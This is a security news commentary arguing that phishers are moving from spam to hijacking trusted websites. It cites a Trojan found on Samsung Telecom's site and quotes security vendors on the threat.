In three years phishing has transformed from an unknown threat into a multi-million dollar industry; in the next stage of their evolution, phishers will be able to avoid sending spam and bypass anti-phishing tools by hijacking small parts of 'trusted' Web sites.
Why would a criminal gang go to all the trouble of creating copy-cat Web sites and then drive users to them by sending out millions of spam e-mails, when all they really have to do is hack into a 'trusted' Web site and modify its code?
OK, so hacking into a 'trusted' Web site may not be all that easy. However, as people become more savvy about phishing scams and less people open unsolicited e-mails, fraudsters need to find alternative ways of stealing users' banking passwords.
Last week, Websense discovered that Samsung Telecom's Web site was hosting a rather nasty Trojan horse. We understand that the Trojan wasn't a danger to people casually browsing the site but this has not yet been proven -- and suspiciously, the main page of the site remains unavailable almost a week after the attack was first reported.
If hackers had access to Samsung's Web servers -- in order to upload the Trojan -- then it seems reasonable to assume they also had access to the Web site code, which means they could have modified the site to inject malware onto visitors' computers. This could be done through exploiting browser vulnerabilities or by using relatively new Web 2.0 tools such as Ajax.
The cybercriminal underworld is well funded and employs skilled software engineers to develop and test malicious code.
In a recent interview with Trend Micro's CTO David Rand, he said: "In one case there was at least US$250,000 funding for one piece of malware. That is a lot. It means they can do QA, proper engineering development, testing and a complete product cycle... We think they are cutting edge technologies".
"Our job, as always, is to anticipate what they are going to do next and create effective countermeasures. If we try to simply play catch up we will never win," he added.
On his blog, the director of Symantec Security Response Dave Cole said that Web 2.0 technologies are attractive to fraudsters because "they leave no trace once the browser is closed and don't rely on a researcher uncovering a Godzilla-style hole in a popular Web browser... it's clear that we've only begun to see what's possible via malicious Web sites".
Tom Chan, enterprise and client services manager for Messagelabs Asia Pacific, told me that because of more educated users and improved anti-spam engines, the success rate for traditional phishing scams is likely to fall soon. By hijacking trusted Web sites, phishers could lure many more victims.
"They are trying to compromise poorly protected Web sites -- they basically go in and enter their own code into that Web server," said Chan, who explained that victims of this new phishing era would not have to do anything 'wrong' in order to get hooked.
"You have gone to a legitimate Web site, you have not made a mistake and done everything right, but then your information gets compromised... because [the phishers] have taken over servers that belong to other people," he said.
Symantec's Cole makes an important point about these new attack vectors. He said that although it will be easier for phishers to infect lots of people in a short amount of time, Web site owners will have the power to kill an attack.
"One thing I think is noteworthy of calling out is the fact that these type of attacks can impact many people quickly, but they can also be halted in short order because they have a central chokepoint: the organisation hosting the Web site or Web service in question.
"This type of attack will not have the staying power of old threats, such as Slammer, Nimda, or other worms that rely on unpatched machines and a decentralised Internet -- they may burn brightly, but should extinguish quickly as well," he said.
However, this is not going to be of any consolation to people that find their bank accounts cleared out despite following the advice of security experts by deploying patches, using the latest security software and only visiting 'safe' Web sites.